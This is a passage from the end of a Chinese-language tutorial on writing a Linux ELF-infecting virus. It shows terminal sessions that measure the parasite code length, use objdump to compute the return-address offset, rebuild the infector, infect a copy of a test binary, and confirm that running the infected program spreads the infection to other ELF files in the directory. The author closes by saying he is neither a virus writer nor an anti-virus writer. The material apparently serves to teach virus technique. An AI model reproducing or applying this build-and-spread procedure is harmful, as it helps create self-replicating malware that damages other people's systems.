先获取病毒代码长度,然后调整gvirus.c中的#define PARACODE_LENGTH定义:
grip2@linux:~/tmp/virus>. /gei -l <.这里获取病毒代码的长度 Parasite code length: 1744 |
获取病毒代码开始位置和0xaabbccdd的地址,计算存放返回地址的地址的偏移:
grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd 8049427: 68 dd cc bb aa push $0xaabbccdd grip2@linux:~/tmp/virus> objdump -d gei|grep "" 08048d80 : 8049450: e9 2b f9 ff ff jmp 8048d80 grip2@linux:~/tmp/virus> objdump -d gei|grep ":" 08048d80 : |
0x8049427与0x8048d80相减即获得我们需要的偏移,用这个值更新gvirus.h中的#define PARACODE_RETADDR_ADDR_OFFSET宏的值。
重新编译:
grip2@linux:~/tmp/virus> make clean rm *.o -rf rm foo -rf rm gei -rf grip2@linux:~/tmp/virus> make gcc foo.c -o foo gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG grip2@linux:~/tmp/virus> ls gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h |
建立一个测试目录,测试一下:
grip2@linux:~/tmp/virus> mkdir test grip2@linux:~/tmp/virus> cp gei foo test grip2@linux:~/tmp/virus> cd test grip2@linux:~/tmp/virus/test> ls gei foo grip2@linux:~/tmp/virus/test> cp foo h |
制作带毒程序:
grip2@linux:~/tmp/virus/test>. /gei h file size: 8668 e_phoff: 00000034 e_shoff: 00001134 e_phentsize: 00000020 e_phnum: 00000008 e_shentsize: 00000028 e_shnum: 00000025 text segment file offset: 0 [15 sections patched] grip2@linux:~/tmp/virus/test> ll total 44 -rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo |
运行带毒程序:
grip2@linux:~/tmp/virus/test>. /h . .. gei foo h .backup.h real elf point grip2@linux:~/tmp/virus/test> ll total 52 -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo |
测试上面带毒程序运行后,是否感染了其他ELF程序:
grip2@linux:~/tmp/virus/test>. /foo . .. gei Better luck next file foo h Better luck next file .backup.h Better luck next file real elf point OK,成功 grip2@linux:~/tmp/virus/test> cp. ./foo hh grip2@linux:~/tmp/virus/test> ll total 64 -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo grip2@linux:~/tmp/virus/test>. /foo . .. gei Better luck next file foo h Better luck next file .backup.h Better luck next file hh real elf point grip2@linux:~/tmp/virus/test> |
六、总结
由于我既不是一个virus coder也不是一个anti-viruscoder,所以对病毒技术的掌握应该是有欠缺的。如果在文章中对病毒技术的描述不够准确,分析不够到位,还请指正,谢谢